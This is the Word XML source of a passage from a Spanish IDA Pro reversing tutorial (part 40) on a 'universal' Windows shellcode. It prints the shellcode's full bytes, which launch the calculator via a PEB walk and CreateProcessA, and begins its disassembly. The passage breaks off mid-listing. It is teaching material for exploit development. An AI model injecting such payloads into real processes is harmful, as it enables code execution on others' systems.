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84A8F1" w14:textId="0515D044" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="000D25A6" w:rsidP="000D25A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_kw0w62pesfq7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="1" w:name="_Toc40957226"/>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>INTRODUCCIÓN AL REVERSING CON IDA PRO DESDE CERO PARTE 40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="090F13D5" w14:textId="175A8007" w:rsidR="00D505AB" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="2022740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62B2D6EA" w14:textId="72F1AB61" w:rsidR="000D25A6" w:rsidRDefault="000D25A6">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4C27B1ED" w14:textId="59E5292C" w:rsidR="000D25A6" w:rsidRDefault="000D25A6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7226" w:history="1">
            <w:r w:rsidRPr="00280D33">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>INTRODUCCIÓN AL REVERSING CON IDA PRO DESDE CERO PARTE 40.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B20E" w14:textId="5516FF03" w:rsidR="000D25A6" w:rsidRDefault="000D25A6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40957227" w:history="1">
            <w:r w:rsidRPr="00280D33">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>SHELLCODE UNIVERSAL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BC1C" w14:textId="6E41F219" w:rsidR="000D25A6" w:rsidRDefault="000D25A6">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkEnd w:id="2" w:displacedByCustomXml="prev"/>
    <w:p w14:paraId="05EE3C47" w14:textId="77777777" w:rsidR="000D25A6" w:rsidRPr="000D25A6" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22788CAD" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="000D25A6" w:rsidP="000D25A6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc40957227"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SHELLCODE UNIVERSAL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="05B98877" w14:textId="321BD6BD" w:rsidR="00D505AB" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7109CFE6" w14:textId="44CC409E" w:rsidR="000D25A6" w:rsidRPr="000D25A6" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>NOTA: En alguna versión moderna de Windows 10 puede haber dejado de funcionar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B4F8E0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Existen miles de tipos de shellcodes, cada uno </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de acuerdo al</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> objetivo que se tiene al hacer el </w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC7354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>Hay shellcodes que son para probar que se puede ejecutar código después de la explotación, normalmente estos ejecutan una calculadora y nada más.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA14212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Obviamente hay shellcodes mucho más complejos que abren consolas remotas, tratan de permanecer en el </w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sistema a pesar de que el programa explotado crashee o se cierre, inyectándose en algún otro proceso del sistema, guardándose como archivo etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B707D64" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4587186E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Hay una biblioteca de shellcodes que buscando en Google podemos encontrar o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>podríamos</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> programar si necesitamos </w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>algo especifico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC10927" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A890B2B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Nosotros usaremos a partir de ahora un SHELLCODE UNIVERSAL que sirve para todas las versiones de Windows y que ejecuta la calculadora, con eso demostraremos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ejecución</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>código</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E169C" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E363C08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El mismo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>salio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>aquí</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A9E52F" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCA13AA" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5">
        <w:r w:rsidRPr="000D25A6">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C614790" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B031AE2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lastRenderedPageBreak/>
        <w:t>shellcode=</w:t>
      </w:r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"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x4</w:t>
      </w:r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7\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x</w:t>
      </w:r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1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B1317" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C881BAA" w14:textId="2F2849BC" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Así</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> como esta lo puedo usar en un script de Python siempre y cuando tenga lugar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la memoria</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para ingresarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9A3F71" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7480C776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>Los bytes sueltos</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> son:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B70EBFD" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0619EE9A" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr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 xml:space="preserve">31 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 64 8b 7b 30 8b 7f 0c 8b 7f 1c 8b 47 08 8b 77 20 8b 3f 80 7e 0c 33 75 f2 89 c7 03 78 3c 8b" 57 78 01 c2 8b 7a 20 01 c7 89 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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dd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 8b 34 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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af</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 01 c6 45 81 3e 43 72 65 61 75 f2 81 7e 08 6f 63 65 73 75 e9 8b 7a 24 01 c7 66 8b 2c 6f 8b 7a 1c 01 c7 8b 7c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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af</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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fc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 01 c7 89 d9 b1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 53 e2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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fd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 68 63 61 6c 63 89 e2 52 52 53 53 53 53 53 53 52 53 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> d7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE34B6F" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D1B1B9" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR FS:[EBX+30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9BDC3A" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XOR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EBX,EBX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="525C64A0" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDI+C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8D39DF" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDI+1C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF2017E" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EAX,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDI+8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783024AC" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ESI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDI+20]         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FBDBE2" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDI]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2F619D" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CMP BYTE PTR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DS:[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ESI+C],33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC0AF2E" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JNZ SHORT CANARY_c.00A7138A              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D6E52" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,EAX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="174E2E50" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ADD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EAX+3C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D536378" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDX,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDI+78]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731BB31B" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ADD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDX,EAX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="08B2FBB6" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDX+20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556F33FB" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ADD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI</w:t>
      </w:r>
      <w:r>
        <w:t>,EAX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="262A0D3C" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EBP,EBX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364A8399" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ESI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDI+EBP*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A76563" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ADD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ESI,EAX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="27E97AE1" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>INC EBP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431BE381" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CMP DWORD PTR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DS:[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ESI],61657243</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF39692" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>JNZ SHORT CANARY_c.00A713A9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE4162F" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CMP DWORD PTR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DS:[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ESI+8],7365636F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F33FD49" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>JNZ SHORT CANARY_c.00A713A9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3888CF28" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR </w:t>
      </w:r>
      <w:r>
        <w:t>DS:[EDX+24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73801243" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ADD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,EAX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1349814A" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>BP,WORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDI+EBP*2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1AB8F" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDX+1C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234F3EDB" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ADD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,EAX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="322B09FD" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PTR DS:[EDI+EBP*4-4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382AEBC1" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ADD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDI,EAX</w:t>
      </w:r>
